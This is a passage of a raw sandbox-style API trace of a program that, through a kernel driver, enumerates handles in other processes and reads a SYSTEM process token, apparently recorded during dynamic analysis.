(Object=0xfffffa8002ee2610) returned 0x2 [0139.202] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.202] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.202] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.203] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xcc, lpOverlapped=0x0) returned 1 [0139.203] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.203] PsAcquireProcessExitSynchronization () returned 0x0 [0139.203] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.203] ObReferenceObjectByHandle (in: Handle=0x628, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002571b80, HandleInformation=0x0) returned 0x0 [0139.203] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.203] PsReleaseProcessExitSynchronization () returned 0x2 [0139.203] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.203] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030c2044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030c2044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.203] ObfDereferenceObject (Object=0xfffffa8002571b80) returned 0x11 [0139.203] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.203] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.204] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.204] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0139.204] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.204] PsAcquireProcessExitSynchronization () returned 0x0 [0139.204] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.204] ObReferenceObjectByHandle (in: Handle=0x62c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f5d830, HandleInformation=0x0) returned 0x0 [0139.204] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.204] PsReleaseProcessExitSynchronization () returned 0x2 [0139.204] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.204] ObQueryNameString (in: Object=0xfffffa8001f5d830, ObjectNameInfo=0xfffffa80030c3044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030c3044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.204] ObfDereferenceObject (Object=0xfffffa8001f5d830) returned 0x1 [0139.204] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.204] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.205] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.205] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0139.205] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.205] PsAcquireProcessExitSynchronization () returned 0x0 [0139.205] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.205] ObReferenceObjectByHandle (in: Handle=0x63c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001170d80, HandleInformation=0x0) returned 0x0 [0139.205] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.205] PsReleaseProcessExitSynchronization () returned 0x2 [0139.205] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.205] ObQueryNameString (in: Object=0xfffff8a001170d80, ObjectNameInfo=0xfffffa80030c4044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030c4044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.205] ObfDereferenceObject (Object=0xfffff8a001170d80) returned 0x8 [0139.205] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.205] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.205] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.205] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0139.205] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.205] PsAcquireProcessExitSynchronization () returned 0x0 [0139.206] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.206] ObReferenceObjectByHandle (in: Handle=0x640, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002533590, HandleInformation=0x0) returned 0x0 [0139.206] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.206] PsReleaseProcessExitSynchronization () returned 0x2 [0139.206] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.206] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030c5044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030c5044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.206] ObfDereferenceObject (Object=0xfffffa8002533590) returned 0x11 [0139.206] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.206] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.206] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.206] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xd8, lpOverlapped=0x0) returned 1 [0139.206] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.206] PsAcquireProcessExitSynchronization () returned 0x0 [0139.206] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.206] ObReferenceObjectByHandle (in: Handle=0x64c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002837920, HandleInformation=0x0) returned 0x0 [0139.206] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.206] PsReleaseProcessExitSynchronization () returned 0x2 [0139.207] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.207] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030c6044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030c6044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.207] ObfDereferenceObject (Object=0xfffffa8002837920) returned 0x12 [0139.207] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.207] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.207] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.207] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xea, lpOverlapped=0x0) returned 1 [0139.207] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.207] PsAcquireProcessExitSynchronization () returned 0x0 [0139.207] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.207] ObReferenceObjectByHandle (in: Handle=0x658, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003aa33e0, HandleInformation=0x0) returned 0x0 [0139.207] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.207] PsReleaseProcessExitSynchronization () returned 0x2 [0139.207] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.207] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030c7044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030c7044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.207] ObfDereferenceObject (Object=0xfffffa8003aa33e0) returned 0x12 [0139.208] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.208] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.208] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.208] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0139.208] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.208] PsAcquireProcessExitSynchronization () returned 0x0 [0139.208] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.208] ObReferenceObjectByHandle (in: Handle=0x65c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002488070, HandleInformation=0x0) returned 0x0 [0139.208] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.208] PsReleaseProcessExitSynchronization () returned 0x2 [0139.208] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.208] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f0d484, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f0d484, ReturnLength=0xfffff88005163508) returned 0x0 [0139.208] ObfDereferenceObject (Object=0xfffffa8002488070) returned 0x11 [0139.208] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.209] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x338) returned 0xc8 [0139.209] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0139.209] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8003801b30, HandleInformation=0x0) returned 0x0 [0139.209] ObOpenObjectByPointer (in: Object=0xfffffa8003801b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000654) returned 0x0 [0139.209] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xd0 [0139.209] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000654, DesiredAccess=0x8, TokenHandle=0xfffffa8003794b40 | out: TokenHandle=0xfffffa8003794b40*=0xc4) returned 0x0 [0139.209] ZwClose (Handle=0xffffffff80000654) returned 0x0 [0139.209] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.209] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0139.210] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0139.671] CloseHandle (hObject=0xc4) returned 1 [0139.671] CloseHandle (hObject=0xc8) returned 1 [0139.671] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.671] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0139.671] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.671] PsAcquireProcessExitSynchronization () returned 0x0 [0139.671] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0) [0139.671] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003554f20, HandleInformation=0x0) returned 0x0 [0139.672] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.672] PsReleaseProcessExitSynchronization () returned 0x2 [0139.672] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0139.672] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f7d044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f7d044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.672] ObfDereferenceObject (Object=0xfffffa8003554f20) returned 0x1 [0139.672] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.672] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.672] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.672] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0139.672] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.672] PsAcquireProcessExitSynchronization () returned 0x0 [0139.672] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0) [0139.672] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036f7a80, HandleInformation=0x0) returned 0x0 [0139.673] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.673] PsReleaseProcessExitSynchronization () returned 0x2 [0139.673] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0139.673] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8002f7e044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f7e044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.673] ObfDereferenceObject (Object=0xfffffa80036f7a80) returned 0x1 [0139.673] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.673] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.673] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.673] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0139.673] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.673] PsAcquireProcessExitSynchronization () returned 0x0 [0139.674] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0) [0139.674] ObReferenceObjectByHandle (in: Handle=0x110, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0139.674] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.674] PsReleaseProcessExitSynchronization () returned 0x2 [0139.674] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0139.674] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8002f7f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f7f044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.674] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0139.674] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.674] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.674] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.674] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0139.674] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.674] PsAcquireProcessExitSynchronization () returned 0x0 [0139.674] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0) [0139.675] ObReferenceObjectByHandle (in: Handle=0x118, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0139.675] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.675] PsReleaseProcessExitSynchronization () returned 0x2 [0139.675] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0139.675] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8002f80044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f80044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.675] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0139.675] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.675] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.675] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.675] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x44, lpOverlapped=0x0) returned 1 [0139.675] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.675] PsAcquireProcessExitSynchronization () returned 0x0 [0139.675] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0) [0139.676] ObReferenceObjectByHandle (in: Handle=0x15c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003837da0, HandleInformation=0x0) returned 0x0 [0139.676] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.676] PsReleaseProcessExitSynchronization () returned 0x2 [0139.676] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0139.676] ObQueryNameString (in: Object=0xfffffa8003410d40, ObjectNameInfo=0xfffffa8002f83044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f83044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.676] ObfDereferenceObject (Object=0xfffffa8003837da0) returned 0x1 [0139.676] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.676] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.676] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.676] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x42, lpOverlapped=0x0) returned 1 [0139.677] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.677] PsAcquireProcessExitSynchronization () returned 0x0 [0139.677] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0) [0139.677] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003833dd0, HandleInformation=0x0) returned 0x0 [0139.677] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.677] PsReleaseProcessExitSynchronization () returned 0x2 [0139.677] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0139.677] ObQueryNameString (in: Object=0xfffffa8003410d40, ObjectNameInfo=0xfffffa8002f84044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f84044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.677] ObfDereferenceObject (Object=0xfffffa8003833dd0) returned 0x1 [0139.677] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.677] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.677] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.677] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0139.677] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.678] PsAcquireProcessExitSynchronization () returned 0x0 [0139.678] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0) [0139.678] ObReferenceObjectByHandle (in: Handle=0x20c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003862c80, HandleInformation=0x0) returned 0x0 [0139.678] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.678] PsReleaseProcessExitSynchronization () returned 0x2 [0139.678] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0139.678] ObQueryNameString (in: Object=0xfffffa8003862c80, ObjectNameInfo=0xfffffa8002f85044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f85044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.678] ObfDereferenceObject (Object=0xfffffa8003862c80) returned 0x1 [0139.678] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.678] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.678] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.678] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, 